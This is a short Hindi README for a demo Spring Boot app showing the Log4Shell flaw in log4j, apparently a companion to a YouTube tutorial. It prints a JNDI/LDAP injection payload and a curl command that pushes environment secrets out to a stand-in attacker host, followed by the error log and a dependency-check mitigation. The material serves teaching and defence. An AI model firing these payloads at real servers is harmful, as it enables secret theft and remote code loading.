
Log4Shell (CVE-2021-44228) Log4j में एक ज़ीरो-डे भेद्यता है।
खोज: 24 नवंबर 2021
पैच किया गया: 6 दिसंबर 2021
यूट्यूब वीडियो के लिए नीचे क्लिक करें
यह नमूना एप्लिकेशन एक स्प्रिंग बूट एप्लिकेशन है, जो लॉगिंग फ्रेमवर्क के रूप में log4j का उपयोग करता है, और localhost पर पोर्ट 8080 पर निम्नलिखित पर्यावरण चरों के साथ चलता है
वीडियो स्पष्टीकरण देखें:
पर्यावरण चर
key=jason.bourne;secret=Treadstone
POST http://localhost:8080//v1/public/log-test
पैरामीटर:
value=${jndi:ldap://some-random-hacking-site.com}

निम्नलिखित स्ट्रिंग का उपयोग करके आप पर्यावरण चर प्राप्त कर सकते हैं
value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}
curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'
2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot
mvn dependency:tree
सुनिश्चित करें कि कोई भी निर्भर jar फ़ाइलें भेद्य log4j संस्करण की ओर इशारा न करें।
Techflix YouTube सुरक्षा प्लेलिस्ट
https://www.youtube.com/watch?v=bb6pgWrm7tA&list=PLLqjNYIgOqeQl6NaeIeUhvNcWdpOVNkRi&index=1